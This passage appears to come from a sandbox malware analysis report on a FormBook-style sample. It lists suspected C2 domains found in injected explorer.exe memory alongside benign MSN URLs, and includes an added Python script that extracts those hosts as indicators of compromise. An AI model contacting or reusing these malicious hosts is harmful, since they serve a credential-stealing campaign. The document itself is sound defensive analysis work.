          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bethlark.top/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bethlark.top/hwu6/www.vytech.net
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bethlark.topReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.dangdut4dselalu.pro
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.dangdut4dselalu.pro/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.dangdut4dselalu.pro/hwu6/www.inefity.cloud
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.dangdut4dselalu.proReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.energyecosystem.app
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.energyecosystem.app/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.energyecosystem.app/hwu6/www.jeeinsight.online
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.energyecosystem.appReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ffgzgbl.xyz
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ffgzgbl.xyz/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ffgzgbl.xyz/hwu6/www.suv-deals-49508.bond
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ffgzgbl.xyzReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.frozenpines.net
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.frozenpines.net/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.frozenpines.netReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.imxtld.club
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.imxtld.club/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imxtld.club/hwu6/www.energyecosystem.app
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imxtld.clubReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inefity.cloud
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inefity.cloud/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inefity.cloud/hwu6/www.vibrantsoul.xyz
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inefity.cloudReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jeeinsight.online
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jeeinsight.online/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jeeinsight.online/hwu6/www.bethlark.top
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jeeinsight.onlineReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suarahati7.xyz
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suarahati7.xyz/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suarahati7.xyz/hwu6/www.dangdut4dselalu.pro
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suarahati7.xyzReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv-deals-49508.bond
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv-deals-49508.bond/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv-deals-49508.bond/hwu6/www.imxtld.club
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv-deals-49508.bondReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz/hwu6/www.frozenpines.net
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyzReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.victory88-pay.xyz
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.victory88-pay.xyz/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.victory88-pay.xyz/hwu6/www.7b5846.online
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.victory88-pay.xyzReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vytech.net
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vytech.net/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vytech.net/hwu6/www.apoppynote.com
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vytech.netReferer:
          Source: explorer.exe, 00000002.00000002.2900901157.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1668078318.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000002.00000000.1658360423.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000002.00000000.1658360423.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000002.00000000.1668078318.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000002.00000002.2898200264.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000002.00000002.2898200264.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000002.00000002.2892314485.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2893904960.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1657261670.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1655826093.0000000001248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000002.00000002.2898200264.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2898200264.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000002.00000002.2898200264.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000002.00000002.2896132549.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000002.00000002.2896132549.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000002.00000000.1668078318.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2900901157.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000002.00000002.2896132549.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000002.00000000.1668078318.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2900901157.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000002.00000000.1668078318.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2900901157.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000000.1668078318.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000002.00000000.1668078318.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2900901157.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000002.00000002.2896132549.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000002.00000000.1658360423.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
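          The string list above mixes two things: explorer.exe's own MSN and Office URLs, which are noise, and the FormBook host list injected into explorer.exe, recognisable because every host shares the single URI "/hwu6/" and several strings carry a second "www.X" after the path. The following script is an added example for this page, not part of the Joe Sandbox report or of any FormBook tooling. It takes the "String found in binary or memory" lines (the sample input is a subset copied from the list above, plus three noise lines from the same list), finds the path shared by the most hosts, and returns every host seen with that path. Assumptions the report does not state: that the shared path is the build's C2 URI, that "Referer:" glued to a host is an HTTP header fragment from the same buffer, and that the trailing "www.X" is residue of a reused URL buffer, so X is recorded as another candidate host only, not as a successor in the rotation order.

```python
"""Extract FormBook C2 host candidates from Joe Sandbox string lines.

Added example; not part of the Joe Sandbox report. Sample lines are copied
from the report's string list (a subset). The campaign-path heuristic, the
"Referer:" stripping and the handling of the trailing "www.X" are assumptions.
"""
import re
from collections import OrderedDict
from urllib.parse import urlsplit

# Memory-region prefix copied from the report; only the URL part is parsed.
SRC = ("Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000."
       "00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ")

SAMPLE_LINES = [SRC + u for u in (
    "http://www.autoitscript.com/autoit3/J",                 # AutoIt runtime, noise
    "http://www.bethlark.top/hwu6/www.vytech.net",
    "http://www.bethlark.topReferer:",                       # host + header fragment
    "http://www.dangdut4dselalu.pro/hwu6/www.inefity.cloud",
    "http://www.energyecosystem.app/hwu6/www.jeeinsight.online",
    "http://www.ffgzgbl.xyz/hwu6/www.suv-deals-49508.bond",
    "http://www.frozenpines.net/hwu6/",
    "http://www.imxtld.club/hwu6/www.energyecosystem.app",
    "http://www.inefity.cloud/hwu6/www.vibrantsoul.xyz",
    "http://www.jeeinsight.online/hwu6/www.bethlark.top",
    "http://www.suarahati7.xyz/hwu6/www.dangdut4dselalu.pro",
    "http://www.suv-deals-49508.bond/hwu6/www.imxtld.club",
    "http://www.vibrantsoul.xyz/hwu6/www.frozenpines.net",
    "http://www.victory88-pay.xyz/hwu6/www.7b5846.online",
    "http://www.vytech.net/hwu6/www.apoppynote.com",
    "https://api.msn.com/v1/news/Feed/Windows?&",            # explorer.exe's own, noise
)]

URL_RE = re.compile(r"String found in binary or memory:\s*(\S+)")
FIRST_SEGMENT = re.compile(r"/[A-Za-z0-9]+/")   # e.g. "/hwu6/" at the start of a path
HEADER_FRAGMENTS = ("Referer:",)                 # assumed buffer residue, not part of the URL


def extract_urls(lines):
    """Return the URL token of every string line, minus known header residue."""
    urls = []
    for line in lines:
        match = URL_RE.search(line)
        if not match:
            continue
        url = match.group(1)
        for frag in HEADER_FRAGMENTS:
            if url.endswith(frag):
                url = url[: -len(frag)]
        urls.append(url)
    return urls


def campaign_path(urls):
    """The leading single-segment path shared by the most URLs, or None."""
    counts = {}
    for url in urls:
        match = FIRST_SEGMENT.match(urlsplit(url).path)
        if match:
            counts[match.group(0)] = counts.get(match.group(0), 0) + 1
    return max(counts, key=counts.get) if counts else None


def strip_www(host):
    return host[4:] if host.startswith("www.") else host


def c2_candidates(urls, path):
    """Map host -> 'primary' (its own URL was seen) or 'trailing' (buffer residue only)."""
    hosts = OrderedDict()
    for url in urls:
        parts = urlsplit(url)
        if not parts.hostname or not parts.path.startswith(path):
            continue
        hosts[strip_www(parts.hostname)] = "primary"      # primary always wins
        tail = parts.path[len(path):]
        if tail.startswith("www."):
            hosts.setdefault(strip_www(tail), "trailing")  # never downgrade a primary
    return hosts


def ioc_report(lines):
    urls = extract_urls(lines)
    path = campaign_path(urls)
    hosts = c2_candidates(urls, path) if path else OrderedDict()
    return path, hosts


if __name__ == "__main__":
    path, hosts = ioc_report(SAMPLE_LINES)
    print(f"campaign URI: {path}")
    for host, how in hosts.items():
        print(f"  {host:28} {how}")
```

          Run against the full list above this yields fifteen hosts: thirteen with their own "/hwu6/" URL and two (7b5846.online, apoppynote.com) seen only as trailing residue. Treat all fifteen as hunting indicators; which one is the live C2 rather than a decoy is not something the strings alone establish, and the decrypted configuration in the "Found malware configuration" section is the place to confirm that.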
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_0102EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_0102EAFF
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_0102ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_0102ED6A
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_0102EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_0102EAFF
          Source: C:\Users\user\Desktop\janacourse2.1.exe Code function: 0_2_0101AB9C GetKeyState,GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 0_2_0101AB9C
